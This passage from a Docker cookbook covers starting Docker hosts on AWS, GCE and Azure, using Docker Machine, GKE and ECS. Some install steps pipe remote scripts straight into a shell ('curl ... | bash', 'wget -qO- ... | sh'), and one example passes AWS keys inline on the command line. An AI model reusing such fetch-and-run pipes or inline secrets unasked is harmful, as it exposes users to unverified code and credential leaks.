[ec2-user@ip-172-31-8-174 ~]$ sudo yum install docker
[ec2-user@ip-172-31-8-174 ~]$ sudo service docker start
[ec2-user@ip-172-31-8-174 ~]$ sudo docker ps
CONTAINER ID   IMAGE   COMMAND   CREATED ...
```

Do not forget to terminate the instance or you might get charged for it:

```
$ aws ec2 terminate-instances --instance-ids <instance id>
```

Discussion

You spent some time in this recipe creating API access keys and installing the CLI. Hopefully, you see the ease of creating Docker hosts in AWS. The standard AMIs are now ready to go: you can install Docker in two commands.
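The Discussion that follows passes these same two install commands to the instance as base64-encoded user data. The encoding round-trips cleanly, which you can check locally before launching anything (GNU coreutils `base64` assumed):

```shell
# The two-command install script from this recipe
cat > docker.sh <<'EOF'
#!/bin/bash
yum -y install docker
service docker start
EOF

# Encode as user data, then decode and compare with the original
udata="$(base64 < docker.sh)"
echo "$udata" | base64 --decode | diff - docker.sh && echo "round-trip OK"
```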
The Amazon Linux AMI also contains cloud-init, which has become the standard for configuring cloud instances at boot time. This allows you to pass user data at instance creation. cloud-init parses the content of the user data and executes the commands. Using the AWS CLI, you can pass some user data to automatically install Docker. The small downside is that it needs to be base64-encoded. Create a small bash script with the two commands from earlier: ```bash #!/bin/bash yum -y install docker service docker start ``` Encode this script and pass it to the instance creation command: ```bash $ udata="$(cat docker.sh | base64 )" $ aws ec2 run-instances --image-id ami-7b3db00c \ --count 1 \ --instance-type t1.micro \ --key-name cookbook \ --user-data $udata $ ssh -i ~/.ssh/id_rsa_cookbook ec2-user@<public_IP_instance> $ sudo docker ps CONTAINER ID IMAGE COMMAND CREATED ... ``` With the Docker daemon running, if you wanted to access it remotely, you would need to set up TLS access, and open port 2376 in your security group. Using this CLI is not Docker-specific. This CLI gives you access to the complete set of AWS APIs. However, using it to start instances and install Docker in them significantly streamlines the provisioning of Docker hosts. See Also - Installing the AWS CLI - Configuring the AWS CLI - Launching an instance via the AWS CLI Starting a Docker Host on Google GCE Problem You want to start a VM instance on the Google GCE cloud and use it as a Docker host. Solution Install the gcloud CLI (you will need to answer a few questions), and then log in to the Google cloud (You will need to have registered before). If the CLI can open a browser, you will be redirected to a web page and asked to sign in and accept the terms of use. If your terminal cannot launch a browser, you will be given a URL to open in a browser. 
This will give you an access token to enter at the command prompt:

```bash
$ curl https://sdk.cloud.google.com | bash
$ gcloud auth login
Your browser has been opened to visit:
    https://accounts.google.com/o/oauth2/auth?redirect_uri=...
...
$ gcloud compute zones list
NAME            REGION        STATUS
asia-east1-c    asia-east1    UP
asia-east1-a    asia-east1    UP
asia-east1-b    asia-east1    UP
europe-west1-b  europe-west1  UP
europe-west1-c  europe-west1  UP
us-central1-f   us-central1   UP
us-central1-b   us-central1   UP
us-central1-a   us-central1   UP
```

If you have not set up a project, set one up in the web console. Projects allow you to manage team members and assign specific permissions to each member. It is roughly equivalent to the Amazon Identity and Access Management (IAM) service.

To start instances, it is handy to set some defaults for the region and zone that you would prefer to use (even though deploying a robust system in the cloud will involve instances in multiple regions and zones). To do this, use the gcloud config set command. For example:

```bash
$ gcloud config set compute/region europe-west1
$ gcloud config set compute/zone europe-west1-c
$ gcloud config list --all
```

To start an instance, you need an image name and an instance type. Then the `gcloud` tool does the rest:

```bash
$ gcloud compute instances create cookbook \
    --machine-type n1-standard-1 \
    --image ubuntu-14-04 \
    --metadata startup-script="sudo wget -qO- https://get.docker.com/ | sh"
...
$ gcloud compute ssh cookbook
sebgoa@cookbook:~$ sudo docker ps
CONTAINER ID  IMAGE  COMMAND  CREATED ...
...
$ gcloud compute instances delete cookbook
```

In this example, you created an Ubuntu 14.04 instance, of machine type `n1-standard-1`, and passed metadata specifying a start-up script. The bash command in the script installs the `docker` package from the Docker Inc. repository. This led to a running instance with Docker running.
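Inlining the start-up script on the command line is fragile to quote correctly. `gcloud` can instead read it from a file with the `--metadata-from-file` flag (the instance and file names below are illustrative; the gcloud invocation is shown commented out because it needs a configured project):

```shell
# Keep the start-up script in a file rather than inlining it
cat > install-docker.sh <<'EOF'
#!/bin/bash
wget -qO- https://get.docker.com/ | sh
EOF

# Hypothetical invocation; gcloud reads the file contents into the
# startup-script metadata key:
#   gcloud compute instances create cookbook \
#       --machine-type n1-standard-1 \
#       --image ubuntu-14-04 \
#       --metadata-from-file startup-script=install-docker.sh

grep -q 'get.docker.com' install-docker.sh && echo "script ready"
```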
The GCE metadata is roughly equivalent to the AWS EC2 user data and is processed by `cloud-init` in the instance.

**Discussion**

If you list the images available in a zone, you will see that some are interesting for Docker-specific tasks:

```bash
$ gcloud compute images list
NAME                 PROJECT            ALIAS         ...
centos-7...          centos-cloud       centos-7      READY ...
coreos-alpha-921...  coreos-cloud                     READY ...
container-vm...      google-containers  container-vm  READY ...
ubuntu-1404-trusty.. ubuntu-os-cloud    ubuntu-14-04  READY ...
```

Indeed, GCE provides CoreOS images, as well as container VMs. CoreOS is discussed in the Docker cookbook. Container VMs are Debian 7–based instances that contain the Docker daemon and the Kubernetes kubelet; they are discussed in the full version of the Docker in the Cloud chapter. Kubernetes is discussed in chapter 5 of the Docker cookbook.

If you want to start a CoreOS instance, you can use the image alias. You do not need to specify any metadata to install Docker:

```bash
$ gcloud compute instances create cookbook --machine-type n1-standard-1 --image coreos
$ gcloud compute ssh cookbook
...
CoreOS (stable)
sebgoa@cookbook ~ $ docker ps
CONTAINER ID  IMAGE  COMMAND  CREATED ...
```

Using the `gcloud` CLI is not Docker-specific. This CLI gives you access to the complete set of GCE APIs. However, using it to start instances and install Docker in them significantly streamlines the provisioning of Docker hosts.

**Starting a Docker Host on Microsoft Azure**

**Problem**

You want to start a VM instance on the Microsoft Azure cloud and use it as a Docker host.

**Solution**

First you need an account on Azure. If you do not want to use the Azure portal, you need to install the Azure CLI. On a fresh Ubuntu 14.04 machine, you would do this:

```bash
$ sudo apt-get update
$ sudo apt-get -y install nodejs-legacy
$ sudo apt-get -y install npm
$ sudo npm install -g azure-cli
$ azure -v
0.8.14
```

Then you need to set up your account for authentication from the CLI.
Several methods are available. One is to download your account settings from the portal and import them on the machine you are using the CLI from:

```bash
$ azure account download
$ azure account import ~/Downloads/Free\ Trial-2-5-2015-credentials.publishsettings
$ azure account list
```

You are now ready to use the Azure CLI to start VM instances. Pick a location and an image:

```
$ azure vm image list | grep Ubuntu
$ azure vm location list
info:    Executing command vm location list
+ Getting locations
data:    Name
data:    ----------------
data:    West Europe
data:    North Europe
data:    East US 2
data:    Central US
data:    South Central US
data:    West US
data:    East US
data:    Southeast Asia
data:    East Asia
data:    Japan West
info:    vm location list command OK
```

To create an instance with ssh access using password authentication, use the `azure vm create` command:

```
$ azure vm create cookbook --ssh=22 \
    --password '#@$#%#@$' \
    --userName cookbook \
    --location "West Europe" \
    b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu-14_04_1-LTS-amd64-server-20150123-en-us-30GB
...
$ azure vm list
...
data:    Name      Status     Location     ...  IP Address
data:    --------  ---------  -----------  ...  ----------
data:    cookbook  ReadyRole  West Europe  ...  100.91.96.137
info:    vm list command OK
```

You can then ssh to the instance and set up Docker normally.

**Discussion**

The Azure CLI is still under active development. The source can be found on GitHub, and a Docker Machine driver is available. The Azure CLI also allows you to create a Docker host automatically by using the `azure vm docker create` command:

```
$ azure vm docker create goasguen -l "West Europe" \
    b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu-14_04_1-LTS-amd64-
```

The host started will automatically have the Docker daemon running, and you can connect to it by using the Docker client and a TLS connection:

```
$ docker --tls -H tcp://goasguen.cloudapp.net:4243 ps
CONTAINER ID   IMAGE   COMMAND   CREATED   STATUS ....
$ docker --tls -H tcp://goasguen.cloudapp.net:4243 images REPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE ``` Using this CLI is not Docker-specific. This CLI gives you access to the complete set of Azure APIs. However, using it to start instances and install Docker in them significantly streamlines the provisioning of Docker hosts. **See Also** - The Azure command-line interface - Starting a CoreOS instance on Azure - Using Docker Machine with Azure **Introducing Docker Machine to Create Docker Hosts in the Cloud** **Problem** You do not want to install the Docker daemon locally using Vagrant or the Docker toolbox. Instead, you would like to use a Docker host in the cloud (e.g., AWS, Azure, DigitalOcean, Exoscale or GCE) and connect to it seamlessly using the local Docker client. **Solution** Use *Docker Machine* to start a cloud instance in your public cloud of choice. *Docker Machine* is a client-side tool that you run on your local host that allows you to start a server in a remote public cloud and use it as a Docker host as if it were local. *Machine* will automatically install Docker and set up TLS for secure communication. You will then be able to use the cloud instance as your Docker host and use it from a local Docker client. --- *Docker Machine* beta was announced on February 26, 2015. Official documentation is now available on the Docker website. The source code is available on GitHub. Let’s get started. *Machine* currently supports VirtualBox, DigitalOcean, AWS, Azure, GCE, and a few other providers. This recipe uses DigitalOcean, so if you want to follow along step by step, you will need an account on DigitalOcean. Once you have an account, do not create a droplet through the DigitalOcean UI. Instead, generate an API access token for using Docker Machine. This token will need to be both a *read* and a *write* token so that Machine can upload a public SSH key (Figure 1-3). 
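The token ends up in an environment variable in the next step; to keep it out of your shell history, you can store it in a file readable only by you and export it from there (the path and token value here are only placeholders):

```shell
# Store the token once, with restrictive permissions
# (in practice something like ~/.config/do_token instead of mktemp)
token_file=$(mktemp)
echo "example-token-value" > "$token_file"
chmod 600 "$token_file"

# Export it without ever typing the token on the command line
export DIGITALOCEAN_ACCESS_TOKEN="$(cat "$token_file")"
[ -n "$DIGITALOCEAN_ACCESS_TOKEN" ] && echo "token loaded"
```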
Set an environment variable `DIGITALOCEAN_ACCESS_TOKEN` in your local computer shell that defines the token you created.

---

Machine will upload an SSH key to your cloud account. Make sure that your access tokens or API keys give you the privileges necessary to create a key.

---

You are almost set. You just need to download the *docker-machine* binary. Go to the documentation site and choose the correct binary for your local computer architecture. For example, on OS X:

```
$ sudo curl -OL https://github.com/docker/machine/releases/download/v0.5.6/docker-machine_darwin-amd64
$ mv docker-machine_darwin-amd64 docker-machine
$ chmod +x docker-machine
$ ./docker-machine --version
docker-machine version 0.5.6
```

With the environment variable `DIGITALOCEAN_ACCESS_TOKEN` set, you can create your remote Docker host:

```
$ ./docker-machine create -d digitalocean foobar
Running pre-create checks...
Creating machine...
(foobar) Creating SSH key...
(foobar) Creating Digital Ocean droplet...
...
To see how to connect Docker to this machine, run: docker-machine env foobar
```

If you go back to your DigitalOcean dashboard, you will see that an SSH key has been created, as well as a new droplet (see Figures 1-4 and 1-5).

To configure your local Docker client to use this remote Docker host, you execute the command that was listed in the output of creating the machine:

```bash
$ ./docker-machine env foobar
export DOCKER_TLS_VERIFY="1"
export DOCKER_HOST="tcp://104.131.102.224:2376"
export DOCKER_CERT_PATH="/Users/.docker/.../machines/foobar"
export DOCKER_MACHINE_NAME="foobar"
# Run this command to configure your shell:
# eval $(./docker-machine env foobar)
$ eval "$(./docker-machine env foobar)"
$ docker ps
CONTAINER ID   IMAGE   COMMAND   CREATED ...
```

Enjoy Docker running remotely on a DigitalOcean droplet created with Docker Machine.
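The `eval "$(./docker-machine env foobar)"` line works because `docker-machine env` simply prints `export` statements to standard output. The mechanism can be seen with a stand-in shell function (the values are the example ones from above; no daemon is contacted):

```shell
# Stand-in for `docker-machine env foobar`: it just prints export statements
machine_env() {
  echo 'export DOCKER_TLS_VERIFY="1"'
  echo 'export DOCKER_HOST="tcp://104.131.102.224:2376"'
}

# eval executes those statements in the current shell, which is what
# points the local docker client at the remote host
eval "$(machine_env)"
echo "$DOCKER_HOST"    # prints tcp://104.131.102.224:2376
```

This is also why the `eval` is needed at all: a child process cannot modify its parent shell's environment, so the exports must run in your current shell.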
**Discussion**

If not specified at the command line, Machine will look for `DIGITALOCEAN_IMAGE`, `DIGITALOCEAN_REGION`, and `DIGITALOCEAN_SIZE` environment variables. By default, they are set to `docker`, `nyc3`, and `512mb`, respectively.

The `docker-machine` binary lets you create multiple machines, on multiple providers. You also have the basic management capabilities: `start`, `stop`, `rm`, and so forth:

```bash
$ ./docker-machine
...
Commands:
  active            Print which machine is active
  config            Print the connection config for machine
  create            Create a machine
  env               Display the commands to set up ...
  inspect           Inspect information about a machine
  ip                Get the IP address of a machine
  kill              Kill a machine
  ls                List machines
  regenerate-certs  Regenerate TLS...
  restart           Restart a machine
  rm                Remove a machine
  ssh               Log into or run a command...
  scp               Copy files between machines
  start             Start a machine
  status            Get the status of a machine
  stop              Stop a machine
  upgrade           Upgrade a machine to the latest version of Docker
  url               Get the URL of a machine
  version           Show the Docker Machine version
  help              Shows a list of commands or ...
```

For instance, you can list the machine you created previously, obtain its IP address, and even connect to it via SSH:

```bash
$ ./docker-machine ls
NAME     ...  DRIVER        STATE    URL
foobar        digitalocean  Running  tcp://104.131.102.224:2376
$ ./docker-machine ip foobar
104.131.102.224
$ ./docker-machine ssh foobar
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-57-generic x86_64)
...
Last login: Mon Mar 16 09:02:13 2015 from ...
root@foobar:~#
```

Before you are finished with this recipe, do not forget to delete the machine you created:

```bash
$ ./docker-machine rm foobar
```

See Also

• Official documentation

Starting a Docker Host on AWS Using Docker Machine

Problem

You understand how to use the AWS CLI to start an instance in the cloud and know how to install Docker (see “Starting a Docker Host on AWS EC2” on page 3). But you would like to use a streamlined process integrated with the Docker user experience.
Solution

Use Docker Machine and its AWS EC2 driver.

Download the release candidate binaries for Docker Machine. Set some environment variables so that Docker Machine knows your AWS API keys and your default VPC in which to start the Docker host. Then use Docker Machine to start the instance. Docker automatically sets up a TLS connection, and you can use this remote Docker host started in AWS. On a 64-bit Linux machine, do the following:

```
$ sudo su
# curl -L https://github.com/docker/machine/releases/download/v0.5.6/docker-machine_linux-amd64 > /usr/local/bin/docker-machine
# chmod +x docker-machine
# exit
$ export AWS_ACCESS_KEY_ID=<your AWS access key>
$ export AWS_SECRET_ACCESS_KEY=<your AWS secret key>
$ export AWS_VPC_ID=<the VPC ID you want to use>
$ docker-machine create -d amazonec2 cookbook
Running pre-create checks...
Creating machine...
(cookbook) Launching instance...
...
To see how to connect Docker to this machine, run: docker-machine env cookbook
```

Once the machine has been created, you can use your local Docker client to communicate with it. Do not forget to kill the machine after you are finished:

```
$ eval "$(docker-machine env cookbook)"
$ docker ps
CONTAINER ID   IMAGE   COMMAND   CREATED   ...
$ docker-machine ls
NAME       ...  DRIVER     STATE    URL
cookbook   ...  amazonec2  Running  tcp://<IP_Machine_AWS>:2376
$ docker-machine rm cookbook
```

You can manage your machines directly from the Docker Machine CLI:

```
$ docker-machine -h
...
```
```
COMMANDS:
  active    Get or set the active machine
  create    Create a machine
  config    Print the connection config for machine
  inspect   Inspect information about a machine
  ip        Get the IP address of a machine
  kill      Kill a machine
  ls        List machines
  restart   Restart a machine
  rm        Remove a machine
  env       Display the commands to set up the environment for the Docker client
  ssh       Log into or run a command on a machine with SSH
  start     Start a machine
  stop      Stop a machine
  upgrade   Upgrade a machine to the latest version of Docker
  url       Get the URL of a machine
  help, h   Shows a list of commands or help for one command
```

Discussion

Docker Machine contains drivers for several cloud providers. We already showcased the Digital Ocean driver (see “Introducing Docker Machine to Create Docker Hosts in the Cloud” on page 11), and you can see how to use it for Azure in “Starting a Docker Host on Azure with Docker Machine” on page 19.

The AWS driver takes several command-line options to set your keys, VPC, key pair, image, and instance type. You can set them up as environment variables as you did previously or directly on the machine command line:

```
$ docker-machine create -h
...
OPTIONS:
   --amazonec2-access-key   AWS Access Key [AWS_ACCESS_KEY_ID]
   --amazonec2-ami          ...
```

Finally, machine will create an SSH key pair and a security group for you. The security group will open traffic on port 2376 to allow communications over TLS from a Docker client. Figure 1-6 shows the rules of the security group in the AWS console.

![Figure 1-6. Security group for machine](image)

Starting a Docker Host on Azure with Docker Machine

Problem

You know how to start a Docker host on Azure by using the Azure CLI, but you would like to unify the way you start Docker hosts in multiple public clouds by using Docker Machine.

Solution

Use the Docker Machine Azure driver. In Figure 1-3, you saw how to use Docker Machine to start a Docker host on DigitalOcean. The same thing can be done on Microsoft Azure. You will need a valid subscription to Azure.
You need to download the `docker-machine` binary. Go to the documentation site and choose the correct binary for your local computer architecture. For example, on OS X:

```
$ wget https://github.com/docker/machine/releases/download/v0.5.6/docker-machine_darwin-amd64
$ mv docker-machine_darwin-amd64 docker-machine
$ chmod +x docker-machine
$ ./docker-machine --version
docker-machine version 0.5.6
```

With a valid Azure subscription, create an X.509 certificate and upload it through the Azure portal. You can create the certificate with the following commands:

```
$ openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout mycert.pem -out mycert.pem
$ openssl pkcs12 -export -out mycert.pfx -in mycert.pem -name "My Certificate"
$ openssl x509 -inform pem -in mycert.pem -outform der -out mycert.cer
```

Upload mycert.cer and define the following environment variables:

```
$ export AZURE_SUBSCRIPTION_ID=<UID of your subscription>
$ export AZURE_SUBSCRIPTION_CERT=mycert.pem
```

You can then use docker-machine and set your local Docker client to use this remote Docker daemon:

```
$ ./docker-machine create -d azure goasguen-foobar
Creating Azure machine...
Waiting for SSH...
"goasguen-foobar" has been created and is now the active machine.
$ ./docker-machine ls
NAME              DRIVER  ...  URL
goasguen-foobar   azure   ...  tcp://goasguen-foobar.cloudapp.net:2376
```

In this example, goasguen-foobar is the name that I gave to my Docker machine. This needs to be a globally unique name. Chances are that names like foobar and test have already been taken.

Discussion

With your local Docker client set up to use the remote Docker daemon running in this Azure virtual machine, you can pull images from your favorite registries and start containers. For example, let's start an Nginx container:

```
$ docker pull nginx
$ docker run -d -p 80:80 nginx
```

To expose port 80 of this remote host in Azure, you need to add an endpoint to the VM that was created.
Head over to the Azure portal, select the VM (here, goasguen-foobar), and add an endpoint for the HTTP request, as in Figure 1-7. Once the endpoint is created, you can access Nginx at http://<unique_name>.cloudapp.net. ![Figure 1-7. Azure endpoint for a virtual machine](image) See Also - Docker Machine Azure driver documentation Running a Cloud Provider CLI in a Docker Container Problem You want to take advantage of containers and run your cloud provider CLI of choice within a container. This gives you more portability options and avoids having to install the CLI from scratch. You just need to download a container image from the Docker Hub. Solution For the Google GCE CLI, there is a public image maintained by Google. Download the image via `docker pull` and run your GCE commands through interactive ephemeral containers. For example: ``` $ docker pull google/cloud-sdk $ docker images | grep google google/cloud-sdk latest a7e7bcdfdc16 ... ``` You can then log in and issue commands as described in “Starting a Docker Host on Google GCE” on page 7. The only difference is that the CLI is running within containers. The login command is issued through a named container. That named container is used as a data volume container (i.e., `--volumes-from cloud-config`) in subsequent CLI calls. This allows you to use the authorization token that is stored in it: ``` $ docker run -t -i --name gcloud-config google/cloud-sdk gcloud auth login ``` Go to the following link in your browser: ``` ... 
```

```
$ docker run --rm -ti --volumes-from gcloud-config google/cloud-sdk gcloud compute zones list
NAME          REGION      STATUS
asia-east1-c  asia-east1  UP
asia-east1-a  asia-east1  UP
```

Using an alias makes things even better:

```bash
$ alias magic='docker run --rm \
    -ti \
    --volumes-from gcloud-config \
    google/cloud-sdk gcloud'
$ magic compute zones list
```

Discussion

A similar process can be used for AWS. If you search for an `awscli` image on Docker Hub, you will see several options. The Dockerfile provided shows you how the image was constructed and the CLI installed within the image. If you take the `nathanleclaire/awscli` image, you notice that no volumes are mounted to keep the credentials from container to container. Hence you need to pass the AWS access keys as environment variables when you launch a container:

```bash
$ docker pull nathanleclaire/awscli
$ docker run --rm \
    -ti \
    -e AWS_ACCESS_KEY_ID="AKIAIUCASDLGFIGDFGS" \
    -e AWS_SECRET_ACCESS_KEY="HwQdNnAIqQERfrgot" \
    nathanleclaire/awscli \
    --region eu-west-1 \
    --output=table \
    ec2 describe-key-pairs
-----------------------------------------------------------
|                     DescribeKeyPairs                    |
+---------------------------------------------------------+
||                        KeyPairs                       ||
|+---------------------------+---------------------------+|
||      KeyFingerprint       |          KeyName          ||
|+---------------------------+---------------------------+|
```

Also notice that `aws` was set up as an entry point in this image. Therefore, you don't need to specify it; you should only pass arguments to it.

**TIP** You can build your own AWS CLI image that allows you to handle API keys more easily.

### See Also

- Official documentation on the containerized Google SDK

### Using Google Container Registry to Store Your Docker Images

#### Problem

You have used a Docker private registry hosted on your own infrastructure but you would like to take advantage of a hosted service.
Specifically, you would like to take advantage of the newly announced Google container registry. **NOTE** Other hosted private registry solutions exist, including Docker Hub Enterprise and Quay.io. This recipe does not represent an endorsement of one versus another. #### Solution If you have not done so yet, sign up on the Google Cloud Platform. Then download the Google Cloud CLI and create a project (see “Starting a Docker Host on Google GCE” on page 7). Make sure that you update your `gcloud` CLI on your Docker host to load the preview components. You will have access to `gcloud docker`, which is a wrapper around the `docker` client: ``` $ gcloud components update $ gcloud docker help Usage: docker [OPTIONS] COMMAND [arg...] ``` A self-sufficient runtime for Linux containers. This example uses a cookbook project on Google Cloud with the project ID `sylvan-plane-862`. Your project name and project ID will differ. As an example, on the Docker host that we are using locally, we have a `busybox` image that we want to upload to the Google Container Registry (GCR). You need to tag the image you want to push to the GCR so that it follows the namespace naming convention of the GCR (i.e., `gcr.io/project_id/image_name`). 
You can then upload the image with `gcloud docker push`:

```bash
$ docker images | grep busybox
busybox    latest    a9eb17255234    8 months ago    2.433 MB
$ docker tag busybox gcr.io/sylvan_plane_862/busybox
$ gcloud docker push gcr.io/sylvan_plane_862/busybox
The push refers to a repository [gcr.io/sylvan_plane_862/busybox] (len: 1)
Sending image list
Pushing repository gcr.io/sylvan_plane_862/busybox (1 tags)
511136ea3c5a: Image successfully pushed
42eed7f1bf2a: Image successfully pushed
120e218dd395: Image successfully pushed
a9eb17255234: Image successfully pushed
Pushing tag for rev [a9eb17255234] on \
{https://gcr.io/v1/repositories/sylvan_plane_862/busybox/tags/latest}
```

The naming convention of the GCR namespace is such that if you have dashes in your project ID, you need to replace them with underscores.

If you navigate to your storage browser in your Google Developers console, you will see that a new bucket has been created and that all the layers making up your image have been uploaded (see Figure 1-8).

Discussion

Google compute instances that you start in the same project that you used to tag the image will automatically have the right privileges to pull that image. If you want other people to be able to pull that image, you need to add them as members to that project. You can set your project by default with `gcloud config set project <project_id>` so you do not have to specify it on subsequent `gcloud` commands.

Let’s start an instance in GCE, `ssh` to it, and pull the `busybox` image from GCR:

```bash
$ gcloud compute instances create cookbook-gce \
    --image container-vm \
    --zone europe-west1-c \
    --machine-type f1-micro
$ gcloud compute ssh cookbook-gce
Updated [https://www.googleapis.com/compute/v1/projects/sylvan-plane-862].
...
$ sudo gcloud docker pull gcr.io/sylvan_plane_862/busybox Pulling repository gcr.io/sylvan_plane_862/busybox a9eb17255234: Download complete 511136ea3c5a: Download complete 42eed7f1bf2a: Download complete 120e218dd395: Download complete Status: Downloaded newer image for gcr.io/sylvan_plane_862/busybox:latest sebastiengoasguen@cookbook:~$ sudo docker images | grep busybox gcr.io/sylvan_plane_862/busybox latest a9eb17255234 ... ``` Figure 1-8. Google container registry image To be able to push from a GCE instance, you need to start it with the correct scope: `--scopes https://www.googleapis.com/auth/devstorage.read_write`. ## Using Kubernetes in the Cloud via GKE ### Problem You want to use a group of Docker hosts and manage containers on them. You like the Kubernetes container orchestration engine but would like to use it as a hosted cloud service. ### Solution Use the Google Container Engine service (GKE). This new service allows you to create a Kubernetes cluster on-demand using the Google API. A cluster will be composed of a master node and a set of compute nodes that act as container VMs, similar to what was described in “Starting a Docker Host on Google GCE” on page 7. GKE is Generally Available (GA). Kubernetes is still under heavy development but has released a stable API with its 1.0 release. For details on Kubernetes, see chapter 5 of the Docker cookbook. Update your `gcloud` SDK to use the container engine preview. If you have not yet installed the Google SDK, see “Starting a Docker Host on Google GCE” on page 7. ``` $ gcloud components update ``` Install the `kubectl` Kubernetes client: ``` $ gcloud components install kubectl ``` Starting a Kubernetes cluster using the GKE service requires a single command: ``` $ gcloud container clusters create cook \ --num-nodes 1 \ --machine-type g1-small Creating cluster cook...done. Created [https://container.googleapis.com/v1/projects/sylvan-plane-862/zones/ \ us-central1-f/clusters/cook]. 
kubeconfig entry generated for cook.
```

Your cluster IP addresses, project name, and zone will differ from what is shown here. What you do see is that a Kubernetes configuration file, *kubeconfig*, was generated for you. It is located at `~/.kube/config` and contains the endpoint of your container cluster as well as the credentials to use it.

You could also create a cluster through the Google Cloud web console (see Figure 1-9).

![Google Cloud Developers Console](image)

*Figure 1-9. Container Engine Wizard*

Once your cluster is up, you can submit containers to it, meaning that you can interact with the underlying Kubernetes master node to launch a group of containers on the set of nodes in your cluster. Groups of containers are defined as *pods*. The `gcloud` CLI gives you a convenient way to define simple pods and submit them to the cluster. Next you are going to launch a container using the *tutum/wordpress* image, which contains a MySQL database. When you installed the `gcloud` CLI, it also installed the Kubernetes client `kubectl`. You can verify that `kubectl` is in your path. It will use the configuration that was autogenerated when you created the cluster. This will allow you to launch containers from your local machine on the remote container cluster securely.

Once the container is scheduled on one of the cluster nodes, you need to create a Kubernetes service to expose the application running in the container to the outside world. This is done again with `kubectl`:

```bash
$ kubectl expose rc wordpress \
    --type=LoadBalancer
NAME        LABELS          SELECTOR        IP(S)  PORT(S)
wordpress   run=wordpress   run=wordpress          80/TCP
```

The `expose` command creates a Kubernetes service (one of the three Kubernetes primitives with pods and replication controllers) and it also obtains a public IP address from a load-balancer.
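If you prefer declarative manifests, the service that `expose` generates can also be written by hand. The following is a sketch, built as a Python dict so it can be dumped to JSON; the field values are assumptions based on the `run=wordpress` label used in this recipe, and fields Kubernetes fills in itself (cluster IP, node port) are omitted:

```python
import json

# A sketch of the v1 Service equivalent to
# `kubectl expose rc wordpress --type=LoadBalancer`.
service = {
    "kind": "Service",
    "apiVersion": "v1",
    "metadata": {"name": "wordpress", "labels": {"run": "wordpress"}},
    "spec": {
        "type": "LoadBalancer",
        # Route traffic to pods carrying the run=wordpress label.
        "selector": {"run": "wordpress"},
        "ports": [{"port": 80, "protocol": "TCP"}],
    },
}

print(json.dumps(service, indent=2))
```

Saved to a file, such a manifest could be created with `kubectl create -f`, just like the pod example later in this recipe.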
The result is that when you list the services in your container cluster, you can see the `wordpress` service with an internal IP and a public IP where you can access the WordPress UI from your laptop:

```bash
$ kubectl get services
NAME        ...  SELECTOR        IP(S)            PORT(S)
wordpress   ...  run=wordpress   10.95.252.182    80/TCP
                                 104.154.82.185
```

You will then be able to enjoy WordPress.

**Discussion**

The `kubectl` CLI can be used to manage all resources in a Kubernetes cluster (i.e., pods, services, replication controllers, nodes). As shown in the following snippet of the `kubectl` usage, you can create, delete, describe, and list all of these resources:

```bash
$ kubectl -h
kubectl controls the Kubernetes cluster manager.

Find more information at https://github.com/GoogleCloudPlatform/kubernetes.

Usage:
  kubectl [flags]
  kubectl [command]

Available Commands:
  get          Display one or many resources
  describe     Show details of a specific resource
  ...
  create       Create a resource by filename or stdin
  replace      Replace a resource by filename or stdin.
  patch        Update field(s) of a resource by stdin.
  delete       Delete a resource by filename, or ...
```

Although you can launch simple pods consisting of a single container, you can also specify a more advanced pod defined in a JSON or YAML file by using the `-f` option:

```bash
$ kubectl create -f /path/to/pod/pod.json
```

A pod can be described in YAML. Here let’s write your pod in a JSON file, using the newly released Kubernetes v1 API version. This pod will start Nginx:

```json
{
  "kind": "Pod",
  "apiVersion": "v1",
  "metadata": {
    "name": "nginx",
    "labels": {
      "app": "nginx"
    }
  },
  "spec": {
    "containers": [
      {
        "name": "nginx",
        "image": "nginx",
        "ports": [
          {
            "containerPort": 80,
            "protocol": "TCP"
          }
        ]
      }
    ]
  }
}
```

Start the pod and check its status.
```bash
$ kubectl create -f nginx.json
pods/nginx
$ kubectl get pods
NAME      READY     STATUS    RESTARTS   AGE
```

Once it is running and you have a firewall with port 80 open for the cluster nodes, you will be able to see the Nginx welcome page. Additional examples are available on the Kubernetes GitHub page.

To clean things up, remove your pods, exit the master node, and delete your cluster:

```bash
$ kubectl delete pods nginx
$ kubectl delete pods wordpress
$ gcloud container clusters delete cook
```

### See Also

- Cluster operations
- Pod operations
- Service operations
- Replication controller operations

### Setting Up to Use the EC2 Container Service

#### Problem

You want to try the new Amazon EC2 Container Service (ECS).

#### Solution

ECS is a generally available service of Amazon Web Services. Getting set up to test ECS involves several steps. This recipe summarizes the main steps, but you should refer to the official documentation for all details:

1. **Sign up** for AWS if you have not done so.
2. Log in to the AWS console. Review “Starting a Docker Host on AWS EC2” on page 3 if needed. You will launch ECS instances within a security group associated with a VPC. Create a VPC and a security group, or ensure that you have default ones present.
3. Go to the IAM console and create a role for ECS. If you are not familiar with IAM, this step is a bit advanced and can be followed step by step on the AWS documentation for ECS.
4. For the role that you just created, create an inline policy. If successful, when you select the Show Policy link, you should see Figure 1-10. See the discussion section of this recipe for an automated way of creating this policy using Boto.

![Figure 1-10. ECS policy in IAM role console](image)

5. Install the latest AWS CLI. The ECS API is available in version 1.7.0 or greater.
You can verify that the `aws ecs` commands are now available:

```
$ sudo pip install awscli
$ aws --version
aws-cli/1.7.8 Python/2.7.9 Darwin/12.6.0
$ aws ecs help
ECS()

NAME
       ecs -

DESCRIPTION
       Amazon EC2 Container Service (Amazon ECS) is a highly scalable,
       fast, container management service that makes it easy to run,
       stop, and manage Docker containers on a cluster of Amazon EC2
       instances. Amazon ECS lets you launch and stop container-enabled
       applications with simple API calls, allows you to get the state
       of your cluster from a centralized service, and gives you access
       to many familiar Amazon EC2 features like security groups,
       Amazon EBS volumes, and IAM roles.
```

6. Create an AWS CLI configuration file that contains the API keys of the IAM user you created. Note the region being set is us-east-1, which is the Northern Virginia region where ECS is currently available:

```
$ cat ~/.aws/config
[default]
output = table
region = us-east-1
aws_access_key_id = <your AWS access key>
aws_secret_access_key = <your AWS secret key>
```

Once you have completed all these steps, you are ready to use ECS. You need to create a cluster (see “Creating an ECS Cluster” on page 33), define tasks corresponding to containers, and run those tasks to start the containers on the cluster (see “Starting Docker Containers on an ECS Cluster” on page 37).

**Discussion**

Creating the IAM profile and the ECS policy for the instances that will be started to form the cluster can be overwhelming if you have not used AWS before. To facilitate this step, you can use the online code accompanying this book, which uses the Python Boto client to create the policy.

